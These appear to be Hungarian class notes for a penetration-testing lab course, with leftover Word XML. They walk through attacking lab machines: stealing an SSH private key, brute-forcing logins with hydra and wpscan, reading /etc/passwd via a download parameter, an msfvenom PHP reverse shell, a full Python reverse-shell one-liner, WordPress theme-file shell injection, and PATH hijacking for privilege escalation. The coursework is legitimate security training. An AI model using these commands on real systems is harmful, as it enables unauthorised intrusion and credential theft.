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Reverse ssh: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ssh -oStrictHostKeyChecking=no student@&lt;ipcim&gt;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belépek a .ssh mappába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kimásolom az id_rsa fájl tartalmát a saját gépemre, kulcs.txt néven pl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ssh -oStrictHostKeyChecking=no -i kulcs.txt student@40.0.0.1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BasicAuth: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nmap scan elsőre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Felmegyünk az ip címre, hátha van a weboldalon valami érdekes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dirb-vel vagy dirbusterrel (lásd: Szeptember 18. órai jegyzet) feltérképezzük, hogy milyen fájlok/mappák vannak a weboldalon. FONTOS HOGY KAPCSOLJUK KI A REKURZIÓT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 KÉT WORDLIST FÁJL AMIT HASZNÁLUNK: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/usr/share/wordlists/dirb/common.txt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/usr/share/wordlists/rockyou.txt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Itt érdekel minket minden ami 2XX-es VAGY 403-es kóddal tér vissza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Ha valahova be kell jelentkezni basicAuth-al, akkor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sudo hydra -l admin -P rockyou.txt -f http-get://40.0.3.1/admin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Dobhat fals pozitívokat, de ha megvan ezzel a jelszó, akkor dirbusterrel vagy dirb-vel ugyanúgy folytatjuk a feltérképezést, de ezúttal megadjuk a kinyert felhasználónevet és jelszót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dirbusternél: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options →advanced options → authentication options : kipipáljuk, beírjuk a dolgokat és ok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példagépen ezután találunk egy user.php és upload és download.php oldalakat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 weblapon az url-ben paraméterrel van megadva hogy mit akarunk letölteni, ide behelyettesíthetünk bármit, pl a /etc/paswd fájlt, és már meg is vannak a felhasználóneveink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Az is lehet, hogy fájlok feltöltésénél nincsen sanitize-olva a fájltípus, és bármit feltölthetünk, pl php scripteket, ezt pedig kihasználhatjuk msfvenom segítségével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msfvenom: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msfvenom -p php/reverse_php LHOST=&lt;sajat_ip&gt; LPORT=&lt;listener_port&gt; -f raw &gt; payload.php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ezzel lesz egy stageless php shellünk, ami bármikor széteshet, akkor shell chainelni fogunk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ehhez használni fogunk egy reverse-shell onelinert, pl pythonban</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002C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https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md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Átírjuk az ip-t és a portot az új listenerre, és megadjuk a shellfajtát amit nyitni akarunk, ileltve átírjuk a python-t python3-ra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python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("30.0.2.21",5555));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'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Wordpress oldalak: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wpscan --url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http://40.0.4.1/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Ha találtunk egy felhasználónevet, akkor a következő paranccsal megpróbálhattuk feltölrni a fiókot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sudo wpscan --url http://40.0.4.20 --usernames admin --passwords /usr/share/wordlists/rockyou.txt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ha megvan a jelszó is akkor csak jelentkezzünk be, de ha a username-ben nem vagyunk bizotsan, egy sikertelen bejelentkezés hibaüzenete lehet megmondja hogy igenis létezik a username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De ha sikerült bejelentkeznünk adminként, akkor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Appearance → theme editor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Az itt lévő php fájlokat kicseréljük olyan kódokra, amik reverse shellt tudnak nekünk készíteni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 comments.php egy jó kiindulópont, de ha nem találunk olyat ami működne, akkor a header.php és a footer.php mindig működik, de ezek veszélyesek, mert elbaszhatják az egész weboldalt, ilyenkor kénytelen leszel újraindítani az egész gépet, amivel a zh-n időt veszítesz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Hasznos webhelyek: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exploit-db,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gtfobins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Kövi óra kérdések: 40.0.6.1-es gépet hogyan kell feltörni?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ab/>
        <w:t xml:space="preserve">       40.0.7.1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ab/>
        <w:t xml:space="preserve">       40.0.10.1</w:t>
        <w:tab/>
        <w:t xml:space="preserve">elfelejtette setupolni?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ab/>
        <w:t xml:space="preserve">       40.0.11.1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Sudo jogok kilistázása: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sudo -l</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050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960625" cy="34813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0625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1417.322834645669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417.3228346456694" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">fájl futtatása más ember jogosultságával: sudo -u &lt;másik felhasználó neve&gt; &lt;sudo -l által kilistázott EGÉSZ SOR&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000053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685846" cy="337053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5846" cy="3370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Path hijacking során ezt a 2 sort tedd bele a hijackelt parancsba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#!/bin/sh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bash -i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echo $PATH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majd fűzd hozzá a hijackelt parancs mappáját a PATH-hez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export PATH=/tmp:$PATH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swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://40.0.4.1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